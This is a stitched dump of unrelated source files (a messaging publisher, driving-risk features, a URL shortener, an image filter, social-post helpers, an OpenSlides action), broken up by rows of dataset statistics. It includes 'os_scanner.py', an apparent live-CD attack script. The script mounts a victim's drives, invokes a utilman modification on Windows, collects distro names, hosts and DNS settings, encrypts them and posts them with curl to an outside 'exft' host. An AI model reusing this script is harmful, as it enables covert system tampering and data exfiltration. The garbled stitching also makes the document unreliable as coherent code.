    # troupe'd Hive created from dynamically loaded source
    bee = _load_beehive_actor(asys, source_zip, 'forest.clearing.beehive.Hive')
    useActorForTest(asys, bee)

def testLoadableColony(asys, source_zip):
    # two-level troupe created from dynamically loaded source
    bee = _load_beehive_actor(asys, source_zip, 'forest.clearing.beehive.Colony')
    useActorForTest(asys, bee)
| 30.082873
| 77
| 0.617998
| 632
| 5,445
| 5.22943
| 0.256329
| 0.026626
| 0.031467
| 0.022693
| 0.552496
| 0.479879
| 0.449924
| 0.410893
| 0.410893
| 0.363086
| 0
| 0.012421
| 0.245914
| 5,445
| 180
| 78
| 30.25
| 0.792499
| 0.040771
| 0
| 0.451852
| 0
| 0
| 0.204676
| 0.046186
| 0
| 0
| 0
| 0
| 0.059259
| 1
| 0.111111
| false
| 0.014815
| 0.066667
| 0
| 0.222222
| 0.014815
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9b739710ac88a977ee95593a167d4e063e1ba18
| 1,197
|
py
|
Python
|
tools/upd.py
|
vladimirivanoviliev/amps-blog-web-grid-bake-off
|
25c24e1fbfc57df4e669487957dd440b338c7847
|
[
"MIT"
] | 3
|
2017-10-21T01:37:03.000Z
|
2021-07-22T16:08:02.000Z
|
tools/upd.py
|
vladimirivanoviliev/amps-blog-web-grid-bake-off
|
25c24e1fbfc57df4e669487957dd440b338c7847
|
[
"MIT"
] | 2
|
2020-01-15T22:50:18.000Z
|
2020-07-19T14:55:28.000Z
|
tools/upd.py
|
vladimirivanoviliev/amps-blog-web-grid-bake-off
|
25c24e1fbfc57df4e669487957dd440b338c7847
|
[
"MIT"
] | 5
|
2020-01-27T13:52:04.000Z
|
2020-10-28T07:38:46.000Z
|
from AMPS import Client
import random
import time
import json
import sys
def main(*args):
    """
    Publish randomized order updates to the 'orders' AMPS topic forever.

    Parameters
    ----------
    *args:
        optional [publish_rate, start, end] as strings/ints; publish_rate is
        messages per second (missing or 0 means publish as fast as possible),
        start/end bound the random order_id range.
    """
    publish_rate = None  # publish as fast as possible by default
    # default order_id range — previously start/end were left undefined when
    # arguments were missing, raising NameError at random.randint below
    start, end = 1, 100
    try:
        publish_rate = int(args[0])
        start = int(args[1])
        end = int(args[2])
    except (IndexError, ValueError):
        # missing or non-numeric arguments: keep the defaults set above
        pass
    # set up the client
    client = Client('the-publisher')
    client.connect('tcp://localhost:9007/amps/json')
    client.logon()
    while True:
        # generate and publish data
        current_id = random.randint(start, end)
        price_usd = random.randint(20000, 30000)
        quantity = random.randint(1, 100)
        total = price_usd * quantity
        client.publish(
            'orders',
            json.dumps({
                'order_id': current_id,
                'name': '>>> TESLA UPDATE <<<',
                'price_usd': price_usd,
                'quantity': quantity,
                'total': total
            })
        )
        if publish_rate is not None and publish_rate > 0:
            # throttle to roughly publish_rate messages per second
            time.sleep(1.0 / publish_rate)
if __name__ == '__main__':
    # detect command line arguments and forward them to main()
    if len(sys.argv) > 1:
        main(*sys.argv[1:])
    else:
        main()
| 23.94
| 65
| 0.548872
| 140
| 1,197
| 4.55
| 0.5
| 0.086342
| 0.050235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033079
| 0.343358
| 1,197
| 49
| 66
| 24.428571
| 0.777354
| 0.093567
| 0
| 0
| 0
| 0
| 0.102778
| 0.027778
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0.026316
| 0.131579
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bbd39d6d8b86209c5aaf7a41e2a233bc9104f2
| 4,815
|
py
|
Python
|
functions/height.py
|
Hilvcha/PINGAN
|
0eb1435750c2ce3dc5de3a50d390aae044360fd5
|
[
"MIT"
] | 7
|
2018-04-01T17:24:56.000Z
|
2021-06-07T09:39:52.000Z
|
functions/height.py
|
Hilvcha/PINGAN
|
0eb1435750c2ce3dc5de3a50d390aae044360fd5
|
[
"MIT"
] | 5
|
2018-03-31T18:24:52.000Z
|
2019-10-09T16:27:49.000Z
|
functions/height.py
|
Hilvcha/PINGAN
|
0eb1435750c2ce3dc5de3a50d390aae044360fd5
|
[
"MIT"
] | 2
|
2020-03-04T08:48:54.000Z
|
2021-06-07T09:39:51.000Z
|
# coding : utf-8
# created by wyj
import numpy as np
import pandas as pd
import math
from utils.feature_utils import df_empty
# TERMINALNO,TIME,TRIP_ID,LONGITUDE,LATITUDE,DIRECTION,HEIGHT,SPEED,CALLSTATE,Y
# Group the input table by trip_id, take each group's maximum contiguous
# subarray of altitude, then the max / mean / variance of those subarrays
# over all of a person's trips.
# def max_sub(arr):
# sum = 0
# height = -999
# tempheight = arr.iloc[0]
# for h in arr:
# sum += h - tempheight
# if sum > height:
# height = sum
# if sum < 0:
# sum = 0
# tempheight = h
# arr['secc_inc']=sum
# return arr
def speed_risk(arr):
    """
    Compute three per-trip risk scores from consecutive samples and write them
    back into the CALLSTATE / HEIGHT / DIRECTION columns of *arr*.

    arr: one trip's dataframe with HEIGHT, DIRECTION, SPEED, CALLSTATE columns
    (assumes rows are in time order — TODO confirm against the caller).
    Returns the mutated *arr*.
    """
    # maximum subarray over uphill sections — disabled experiment kept from the original
    # sum = 0
    # height = -999
    tempheight = arr['HEIGHT'].iloc[0]
    tempdirection = arr['DIRECTION'].iloc[0]
    tempspeed = arr['SPEED'].iloc[0]
    # risk factor for altitude change
    height_risk = 0
    # risk factor for direction change
    dir_risk = 0
    # risk factor for phone use while moving
    call_risk = 0
    for index, row in arr.iterrows():
        # sum += row['HEIGHT'] - tempheight
        # if sum > height:
        #     height = sum
        # if sum < 0:
        #     sum = 0
        if tempspeed > 0 and row["CALLSTATE"] != 4:
            # CALLSTATE 4 presumably means "not in a call", 0 presumably
            # "unknown" (weighted down by 0.02) — TODO confirm encoding
            if row["CALLSTATE"] == 0:
                call_risk += math.exp(tempspeed / 10) * 0.02
            else:
                call_risk += math.exp(tempspeed / 10)
        D_height = abs(row['HEIGHT'] - tempheight)
        D_speed = abs(row['SPEED'] - tempspeed)  # NOTE(review): computed but never used
        height_risk += math.pow(row["SPEED"], D_height / 100)
        tempspeed = row['SPEED']
        tempheight = row['HEIGHT']
        # heading delta in units of 90 degrees; the 360 term accounts for wrap-around
        D_direction = min(abs(row["DIRECTION"] - tempdirection), abs(360 + tempdirection - row["DIRECTION"])) / 90.0
        dir_risk += math.pow((row["SPEED"] / 10), D_direction / 10)
        tempdirection = row['DIRECTION']
    # arr['SUCC_INC'] = height
    # overwrite the original columns with the aggregated trip-level scores
    arr["CALLSTATE"] = call_risk
    arr['HEIGHT'] = height_risk
    arr['DIRECTION'] = dir_risk
    return arr
def height_feet(data):
    """Build the per-driver (TERMINALNO) feature table.

    Combines the per-trip risk scores produced by ``speed_risk`` with
    height, trip-length and speed statistics.  Returns a DataFrame indexed
    by TERMINALNO with eight columns (see the rename at the bottom).
    """
    # Per-trip risk scores; speed_risk overwrites the HEIGHT, DIRECTION and
    # CALLSTATE columns of each group with scalar totals.
    data_speed_risk = data[["TERMINALNO", 'TRIP_ID', 'HEIGHT', 'SPEED', 'DIRECTION', "CALLSTATE"]].groupby(
        ["TERMINALNO", 'TRIP_ID'],
        as_index=False).apply(
        speed_risk)
    # Aggregate per trip_id: every row of a trip carries the same totals,
    # so taking the first row collapses each trip to a single record.
    data_speed_risk = data_speed_risk[
        ["TERMINALNO", 'TRIP_ID', 'HEIGHT', 'DIRECTION', "CALLSTATE"]].groupby(
        ["TERMINALNO", 'TRIP_ID'],
        as_index=False).first()
    # max_data = data_speed_risk[["TERMINALNO", 'SUCC_INC']].groupby(["TERMINALNO"], as_index=True).max()
    # mean_data = data_speed_risk[["TERMINALNO", 'SUCC_INC']].groupby(["TERMINALNO"], as_index=True).mean()
    # var_data = data_speed_risk[["TERMINALNO", 'SUCC_INC']].groupby(["TERMINALNO"], as_index=True).var()
    # train_data=pd.concat([max_data, mean_data, var_data], axis=1)
    # train_data.columns = ['MAX_SUCC_INC', 'MEAN_SUCC_INC', 'VAR_SUCC_INC']
    # Sum the per-trip risks over all of a driver's trips.
    train_data = data_speed_risk[["TERMINALNO", 'HEIGHT', 'DIRECTION', "CALLSTATE"]].groupby(
        ["TERMINALNO"],
        as_index=True).sum()
    # Height statistics per driver (mean and variance).
    height_sta = data[['TERMINALNO', "HEIGHT"]].groupby(['TERMINALNO']).agg([np.mean, np.var])
    # Longest trip, measured as the number of records in the trip.
    max_time = data[['TERMINALNO', "TRIP_ID", "TIME"]].groupby(["TERMINALNO", 'TRIP_ID'], as_index=False).count()
    max_time = max_time[['TERMINALNO', 'TIME']].groupby(["TERMINALNO"]).max()
    # Speed statistics per driver (mean and max).
    speed_sta = data[['TERMINALNO', "SPEED"]].groupby(['TERMINALNO']).agg([np.mean, np.max])
    # # Average downhill run (disabled; would use maxSubArray below).
    # height_down = data[['TERMINALNO', "TRIP_ID", "HEIGHT"]].groupby(["TERMINALNO", 'TRIP_ID'], as_index=False).agg(
    #     maxSubArray)
    # height_down = height_down[['TERMINALNO', "HEIGHT"]].groupby(['TERMINALNO']).agg([np.mean, np.min])
    # # Average uphill run (disabled; would use minSubArray below).
    # height_up = data[['TERMINALNO', "TRIP_ID", "HEIGHT"]].groupby(["TERMINALNO", 'TRIP_ID'], as_index=False).agg(
    #     minSubArray)
    # height_up = height_up[['TERMINALNO', "HEIGHT"]].groupby(['TERMINALNO']).agg([np.mean, np.max])
    # Column-wise concat works because every frame is indexed by TERMINALNO.
    train_data = pd.concat([train_data, height_sta, max_time, speed_sta,], axis=1)
    train_data.columns = ['height_risk', 'direction_risk', "callstate_risk", "height_mean", "height_var", "max_time",
                          "speed_mean", "speed_max",]
    return train_data
# 'TERMINALNO', 'maxTime', 'phonerisk', 'dir_risk', 'height_risk', 'speed_max',
# 'speed_mean', 'height_mean', 'Zao', 'Wan', 'Sheye'
def maxSubArray(arr):
    """Return the most negative cumulative height change (steepest descent).

    Kadane-style scan: accumulates ``h - anchor`` deltas, resetting the
    anchor whenever the running total turns positive, and keeps the
    minimum total seen.  The result is always <= 0 for non-empty input
    (the first iteration contributes a delta of 0).

    Parameters
    ----------
    arr : pandas.Series
        Height samples, accessed positionally via ``iloc``.
    """
    best = 99999          # minimum running total seen so far
    total = 0             # running total; renamed from `sum` (shadowed the builtin)
    anchor = arr.iloc[0]  # height the deltas are measured against
    for h in arr:
        total += h - anchor
        if total < best:
            best = total
        if total > 0:
            # Climbing: restart the descent measurement from here.
            total = 0
            anchor = h
    return best
def minSubArray(arr):
    """Return the largest cumulative height gain (steepest continuous climb).

    Mirror image of ``maxSubArray``: the base height is reset whenever the
    running gain drops below zero, and the maximum gain seen is kept.
    """
    best_gain = -99999
    running = 0
    base = arr.iloc[0]
    for h in arr:
        running += h - base
        best_gain = max(best_gain, running)
        if running < 0:
            # Descending: restart the climb measurement from here.
            running = 0
            base = h
    return best_gain
| 32.979452
| 117
| 0.586708
| 586
| 4,815
| 4.638225
| 0.18942
| 0.087564
| 0.058867
| 0.042311
| 0.459529
| 0.389257
| 0.355776
| 0.33039
| 0.281825
| 0.242826
| 0
| 0.017481
| 0.251506
| 4,815
| 145
| 118
| 33.206897
| 0.736681
| 0.353894
| 0
| 0.246575
| 0
| 0
| 0.158875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054795
| false
| 0
| 0.054795
| 0
| 0.164384
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bc10c08079eec1973b577a0d5e59f56835d97e
| 2,850
|
py
|
Python
|
live_cd_scripts/os_scanner.py
|
ForbiddenApplePy/applepy
|
4eb0965f7f634b0f340beee54dce09c12e3e4f54
|
[
"WTFPL"
] | null | null | null |
live_cd_scripts/os_scanner.py
|
ForbiddenApplePy/applepy
|
4eb0965f7f634b0f340beee54dce09c12e3e4f54
|
[
"WTFPL"
] | null | null | null |
live_cd_scripts/os_scanner.py
|
ForbiddenApplePy/applepy
|
4eb0965f7f634b0f340beee54dce09c12e3e4f54
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import json
import windows_utilman
import pyAesCrypt
import requests
from secureCrypt import cryptResult
os.system('loadkeys fr')
os.system('lsblk > result.txt')
if os.path.exists('/mnt/targetDrive'):
pass
else:
os.system('mkdir /mnt/targetDrive')
def parse(file_name):
# Listing all drives and removing special char from the command return and saving them to a file
result = []
with open(file_name) as input_file:
for line in input_file:
temp_arr = line.split(' ')
for item in temp_arr:
if '└─' in item or '├─' in item:
result.append(item.replace('└─', '').replace('├─', ''))
os.remove(file_name)
return result
def check_for_os(list):
# Checking for OS installed on the drive
os_list = {'Os': 'location'}
hosts = {'Host': 'address'}
servers = {"DNS": "address"}
for drive in drives_list:
os.system('mount /dev/%s /mnt/targetDrive' % (drive))
print('Looking for OS on '+drive+'...\n')
if os.path.isdir('/mnt/targetDrive/Windows'):
# Checking for Windows installation
os_list['Windows'] = drive
windows_utilman.utilman()
elif os.path.isdir('/mnt/targetDrive/etc'):
# Looking for Linux and grabbing files
f = open('/mnt/targetDrive/etc/issue')
for x in f:
# Listing distros
x = x.split()
x = x[:len(x)-2]
x = ' '.join(x)
if x != '':
os_list[x] = drive
f = open('/etc/hosts')
for x in f:
# Checking hosts
x = x.split()
hosts[x[1]] = x[0]
f = open('/etc/resolv.conf')
for x in f:
# Checking DNS
x = x.split()
if x:
if x[0] != "#":
if x[0] == "options":
pass
else:
servers[x[0]] = x[1]
results = []
results.append(os_list)
results.append(hosts)
results.append(servers)
return results
# Program starts here
drives_list = parse("result.txt")
results = check_for_os(drives_list)
# Saving results as json file
json = json.dumps(results)
if os.path.exists('results.json'):
f = open('results.json', 'w')
else:
f = open('results.json', 'x')
f.write(json)
f.close()
# Crypting file before sending it to our server and removing the base file just in case
cryptResult("results.json")
os.remove("results.json")
# Sending file to the server
os.system('curl -i -X POST -H "Content-Type: multipart/form-data" -F "host=test" -F "file=@results.json.aes" https://exft.avapxia.tk/')
| 29.6875
| 135
| 0.545614
| 369
| 2,850
| 4.181572
| 0.365854
| 0.054439
| 0.015554
| 0.01361
| 0.051847
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004139
| 0.321754
| 2,850
| 95
| 136
| 30
| 0.789964
| 0.157193
| 0
| 0.15493
| 0
| 0.014085
| 0.195061
| 0.030975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0.028169
| 0.098592
| 0
| 0.15493
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bd49e911285196dc03e66b536b44da7fb8a285
| 2,336
|
py
|
Python
|
app/views.py
|
taeram/idiocy
|
01acf569785f0294540a1b0214b8eccd81818b9c
|
[
"MIT"
] | null | null | null |
app/views.py
|
taeram/idiocy
|
01acf569785f0294540a1b0214b8eccd81818b9c
|
[
"MIT"
] | 1
|
2019-12-06T21:20:10.000Z
|
2019-12-06T21:20:11.000Z
|
app/views.py
|
taeram/idiocy
|
01acf569785f0294540a1b0214b8eccd81818b9c
|
[
"MIT"
] | null | null | null |
from app import app
import os
from flask import abort, \
redirect, \
render_template, \
request, \
send_from_directory, \
url_for
from .helpers import generate_code, \
is_valid_url, \
is_authenticated, \
strip_file_extension
from .database import db, \
Urls
from .filters import strip_www
@app.route('/favicon.ico')
def favicon():
    """Serve the site icon from the app's static folder."""
    static_dir = os.path.join(app.root_path, 'static')
    return send_from_directory(static_dir, 'favicon.png', mimetype='image/png')
@app.route('/', methods=['GET', 'POST', 'HEAD'])
def shorten():
    """Landing page (GET/HEAD) and URL-shortening endpoint (POST).

    POST requires an API key (see is_authenticated) and a `url` form
    field; returns the shortened URL as plain text, reusing an existing
    code when the URL was shortened before.
    """
    if request.method in ('GET', 'HEAD'):
        # BUG FIX: 'HEAD' is listed in `methods`, so Flask dispatches HEAD
        # requests here with request.method == 'HEAD'; the old `== 'GET'`
        # check fell through every branch and returned None (HTTP 500).
        return render_template('hello.html')

    # POST from here on.
    if not is_authenticated():
        return app.response_class(response='{"error": "Invalid API key"}', mimetype='application/json', status=403)

    url = request.form['url'].strip()
    if not is_valid_url(url):
        return app.response_class(response='{"error": "Invalid URL"}', mimetype='application/json', status=403)

    # Has this URL been previously stored? Reuse its code if so.
    row = db.session.query(Urls).\
        filter(Urls.url == url).\
        first()
    if not row:
        row = Urls(url=url, code=generate_code())
        db.session.add(row)
        db.session.commit()

    return strip_www(url_for('bounce', code=row.code, _external=True))
@app.route('/<code>', methods=['GET', 'DELETE'])
def bounce(code):
    """Redirect to the URL stored under `code` (GET) or remove it (DELETE)."""
    code = strip_file_extension(code)
    row = (db.session.query(Urls)
           .filter(Urls.code == code)
           .first())
    if not row:
        abort(404)

    if request.method == 'GET':
        # Count the click before redirecting.
        row.clicks += 1
        db.session.add(row)
        db.session.commit()
        return redirect(row.url)

    # DELETE: drop the mapping and echo back the (now dead) short URL.
    db.session.delete(row)
    db.session.commit()
    return strip_www(url_for('bounce', code=row.code, _external=True))
@app.route('/list', methods=['GET'])
def list():
    """Render the 25 oldest short URLs.

    NOTE: the function name shadows the builtin `list`, but it doubles as
    the Flask endpoint name used by url_for(), so it must stay.
    """
    urls = (db.session.query(Urls)
            .order_by(Urls.created)
            .limit(25)
            .all())
    return render_template('list.html', urls=urls)
| 31.146667
| 119
| 0.550514
| 266
| 2,336
| 4.718045
| 0.330827
| 0.064542
| 0.047809
| 0.043028
| 0.3251
| 0.274104
| 0.274104
| 0.157769
| 0.119522
| 0.119522
| 0
| 0.007467
| 0.312072
| 2,336
| 74
| 120
| 31.567568
| 0.773491
| 0.015411
| 0
| 0.25
| 0
| 0
| 0.090513
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.1
| 0.016667
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bfd30a608b29439adc950385f985d929b086eb
| 1,443
|
py
|
Python
|
prepare_dataset/filter_ratio_and_warnings.py
|
Florian-Barthel/stylegan2
|
4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8
|
[
"BSD-Source-Code"
] | null | null | null |
prepare_dataset/filter_ratio_and_warnings.py
|
Florian-Barthel/stylegan2
|
4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8
|
[
"BSD-Source-Code"
] | null | null | null |
prepare_dataset/filter_ratio_and_warnings.py
|
Florian-Barthel/stylegan2
|
4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8
|
[
"BSD-Source-Code"
] | null | null | null |
from tqdm import tqdm
import shutil
import os
from PIL import Image
import warnings
# Copy images (and their optional .json label files) from src_folder to
# dest_folder, dropping portrait-oriented images and files Pillow cannot
# open cleanly (e.g. a corrupt EXIF block raising a UserWarning).
src_folder = '../../modified_datasets/cars_flat'
dest_folder = '../../modified_datasets/cars_flat_ratio_warnings'

if not os.path.exists(dest_folder):
    os.makedirs(dest_folder)

num_kept = 0
num_removed = 0
num_corrupt_EXIF = 0

for file in tqdm(os.listdir(src_folder)):
    # endswith accepts a tuple — one call instead of an `or` chain.
    if file.lower().endswith(('.jpg', '.jpeg', '.png')):
        src_img = src_folder + '/' + file
        dest_img = dest_folder + '/' + file
        src_label = src_folder + '/' + file + '.json'
        dest_label = dest_folder + '/' + file + '.json'
        # Escalate UserWarning to an error inside this block only, so images
        # with corrupt metadata land in the except branch.
        # (BUG FIX: catch_warnings() yields None unless record=True, so the
        # old `as my_warning` binding was always None and has been dropped.)
        with warnings.catch_warnings():
            warnings.simplefilter('error', UserWarning)
            try:
                img = Image.open(src_img)
                w, h = img.size
                if w < h:
                    print('removed invalid ratio')
                    num_removed += 1
                    continue
                shutil.copyfile(src_img, dest_img)
                if os.path.exists(src_label):
                    shutil.copyfile(src_label, dest_label)
                num_kept += 1
            except Exception:
                # Was a bare `except:`; narrowed so KeyboardInterrupt and
                # SystemExit still propagate.
                print('removed invalid format')
                num_corrupt_EXIF += 1

print('Summary:')
print('removed corrupt_exif: ' + str(num_corrupt_EXIF))
print('removed: ' + str(num_removed))
print('kept: ' + str(num_kept))
| 31.369565
| 104
| 0.582121
| 176
| 1,443
| 4.545455
| 0.352273
| 0.0625
| 0.0525
| 0.065
| 0.075
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005917
| 0.297297
| 1,443
| 45
| 105
| 32.066667
| 0.783037
| 0
| 0
| 0
| 0
| 0
| 0.139293
| 0.056133
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.131579
| 0
| 0.131579
| 0.157895
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c1766ed44cd38de086fdbbfdce35e66d2ab6f5
| 2,548
|
py
|
Python
|
src/backend/apps/posts/utils.py
|
Vixx-X/ati-project
|
0ef80772a6fc3807e401cf58b9e15f3628373383
|
[
"MIT"
] | null | null | null |
src/backend/apps/posts/utils.py
|
Vixx-X/ati-project
|
0ef80772a6fc3807e401cf58b9e15f3628373383
|
[
"MIT"
] | 61
|
2021-06-10T03:27:06.000Z
|
2022-03-12T01:01:34.000Z
|
src/backend/apps/posts/utils.py
|
Vixx-X/ati-project
|
0ef80772a6fc3807e401cf58b9e15f3628373383
|
[
"MIT"
] | null | null | null |
from mongoengine.queryset.visitor import Q
from backend.apps.posts.models import Post
from backend.apps.user.signals import check_comment_signal
from backend.apps.user.utils import are_friends
def _get_two_last_obj_with_path(path_list):
    """Resolve a *reversed* id path into (parent, leaf) objects.

    `path_list` is a "/"-path split and reversed, so the root post id is
    the LAST element and the target comment id is the FIRST.

    Returns (parent, son): `son` is the object addressed by the full path,
    `parent` the object one level up.  For a one-element path both are the
    Post itself.
    """
    size = len(path_list)
    if not size:
        raise Exception("path_list cannot be empty")
    pk = path_list[0]
    if size == 1:
        # Base case: the path is just the post id.
        post = Post.objects.get(id=pk)
        return post, post
    parent, son = _get_two_last_obj_with_path(path_list[1:])
    # NOTE(review): the recursive `parent` is discarded immediately — the
    # previous `son` becomes the parent of this level.  Looks intentional
    # (parent = one level above the leaf), but worth confirming.
    parent = son
    son = son.comments.get(id=pk)
    return parent, son
def get_two_last_obj_with_path(path):
    """Like :func:`_get_two_last_obj_with_path`, but takes a "/"-separated path string."""
    reversed_ids = path.split("/")[::-1]
    return _get_two_last_obj_with_path(reversed_ids)
def get_object_by_path(path):
    """Return the post/comment addressed by a "/"-separated id path.

    BUG FIX: the raw path string was previously passed straight to
    `_get_two_last_obj_with_path`, which expects a reversed id *list* —
    indexing the string handed it a single character as the id.  Route
    through `get_two_last_obj_with_path` so the path is split and
    reversed first.
    """
    _, son = get_two_last_obj_with_path(path)
    return son
def save_comment_by_path(path, comment):
    """
    Saving comment inserting it in root comment or post, given that we
    only have 2-depth comments
    """
    parent, son = get_two_last_obj_with_path(path)
    # Depth 1 (parent is the Post, son is a root comment): nest the reply
    # under the root comment.  Anything deeper is flattened onto `parent`
    # (the level above the leaf), enforcing the 2-level limit.
    if isinstance(parent, Post) and not isinstance(son, Post):
        son.comments.append(comment)
    else:
        parent.comments.append(comment)
    # The first path segment is the post id; saving the root document
    # persists the embedded comment tree.
    post = get_object_by_path(path.split("/")[0])
    post.save()
    # notify son author
    check_comment_signal.send(comment.author, son.author)
def get_comments(obj, page=1, size=10, path=None):
    """Return one page of `obj`'s comments plus one level of replies.

    Each entry is ``{"comments": <comment dict>, "more": <path list>}``;
    the comment dict carries a "reply" path and up to ``size // 2`` child
    dicts under "comments".

    NOTE(review): `path` is required in practice — `path.split` raises on
    the default None.  The only caller (get_comments_by_path) always
    passes it.
    """
    start = (page - 1) * size
    end = start + size
    raiz = []
    for com in obj.comments[start:end]:
        curr = com.as_dict()
        childs = []
        # BUG FIX: `size / 2` is a float in Python 3 and not a valid slice
        # bound (TypeError); use integer division.
        for child in com.comments[: size // 2]:
            c = child.as_dict()
            c["reply"] = path.split("/") + [curr["id"], c["id"]]
            childs.append(c)
        # BUG FIX: `setattr(curr, "comments", childs)` raised
        # AttributeError — `curr` is a plain dict, so use item assignment.
        curr["comments"] = childs
        curr["reply"] = path.split("/") + [curr["id"]]
        junior = {"comments": curr, "more": path.split("/") + [curr["id"]]}
        raiz.append(junior)
    ret = {"comments": raiz}
    if len(raiz) == size:
        ret["more"] = path.split("/")
    # NOTE(review): `ret` (with its "more" marker) is built but never
    # returned; keeping the original `raiz` return to preserve the API —
    # confirm whether `ret` was the intended payload.
    return raiz
def get_comments_by_path(path, page, size):
    """Page through the replies of the comment addressed by `path`."""
    target = get_object_by_path(path)
    return get_comments(target, page, size, path)
def get_main_posts(requester):
    """Return the feed for `requester`: public posts plus friends' posts,
    newest first.

    BUG FIX: the two Q objects were combined with the Python `or`
    operator, which short-circuits to the first (always-truthy) Q object
    and silently dropped the friends clause; the mongoengine `|` operator
    builds the real OR filter.
    """
    return Post.objects.filter(
        Q(public=True) | Q(author__in=requester.friends)
    ).order_by("-time_created")
def get_posts_by_user(user, requester):
    """Return `user`'s posts visible to `requester`, newest first.

    Friends see everything; otherwise only public posts or posts authored
    by the requester are included.
    """
    if are_friends(user, requester):
        visibility = Q()
    else:
        visibility = Q(public=True) | Q(author=requester)
    return Post.objects.filter(Q(author=user) & visibility).order_by("-time_created")
| 29.627907
| 76
| 0.654631
| 367
| 2,548
| 4.326975
| 0.26703
| 0.055416
| 0.037783
| 0.049118
| 0.185139
| 0.124055
| 0.124055
| 0.108312
| 0.042821
| 0
| 0
| 0.005497
| 0.214678
| 2,548
| 85
| 77
| 29.976471
| 0.788106
| 0.043956
| 0
| 0
| 0
| 0
| 0.044288
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131148
| false
| 0
| 0.065574
| 0.032787
| 0.327869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c3402cd5440828a3062f0ffd949c6878c6a821
| 5,340
|
py
|
Python
|
openslides_backend/action/actions/projector/toggle.py
|
ostcar/openslides-backend
|
e6ceac497c37a1e3e7f408c6cfb29cf21d985b4c
|
[
"MIT"
] | 5
|
2020-01-20T13:57:15.000Z
|
2021-03-27T14:14:44.000Z
|
openslides_backend/action/actions/projector/toggle.py
|
ostcar/openslides-backend
|
e6ceac497c37a1e3e7f408c6cfb29cf21d985b4c
|
[
"MIT"
] | 859
|
2020-01-11T22:58:37.000Z
|
2022-03-30T14:54:06.000Z
|
openslides_backend/action/actions/projector/toggle.py
|
ostcar/openslides-backend
|
e6ceac497c37a1e3e7f408c6cfb29cf21d985b4c
|
[
"MIT"
] | 16
|
2020-01-04T20:28:57.000Z
|
2022-02-10T12:06:54.000Z
|
from typing import Any, Dict, List
from ....models.models import Projection, Projector
from ....permissions.permissions import Permissions
from ....shared.filters import And, FilterOperator
from ....shared.patterns import Collection, FullQualifiedId, string_to_fqid
from ....shared.schema import required_id_schema
from ...generics.update import UpdateAction
from ...util.assert_belongs_to_meeting import assert_belongs_to_meeting
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
from ...util.typing import ActionData
from ..projection.create import ProjectionCreate
from ..projection.delete import ProjectionDelete
from ..projection.update import ProjectionUpdate
@register_action("projector.toggle")
class ProjectorToggle(UpdateAction):
    """
    Action to toggle projections.

    For every requested projector: if a projection matching the payload
    (content object, stable flag and optional type) is already on the
    projector it is turned off — deleted when stable, moved to the
    projector's history when unstable; otherwise a new projection is
    created.
    """

    model = Projector()
    # Projection payload plus a non-empty, duplicate-free list of projector
    # ids ("ids") to toggle on.
    schema = DefaultSchema(Projection()).get_default_schema(
        title="Projector toggle stable schema",
        required_properties=["content_object_id", "meeting_id"],
        optional_properties=["options", "type", "stable"],
        additional_required_fields={
            "ids": {
                "type": "array",
                "items": required_id_schema,
                "uniqueItems": True,
                "minItems": 1,
            },
        },
    )
    permission = Permissions.Projector.CAN_MANAGE

    def get_updated_instances(self, action_data: ActionData) -> ActionData:
        # Generator yielding projector updates; projection create/delete/move
        # happens through execute_other_action side effects.
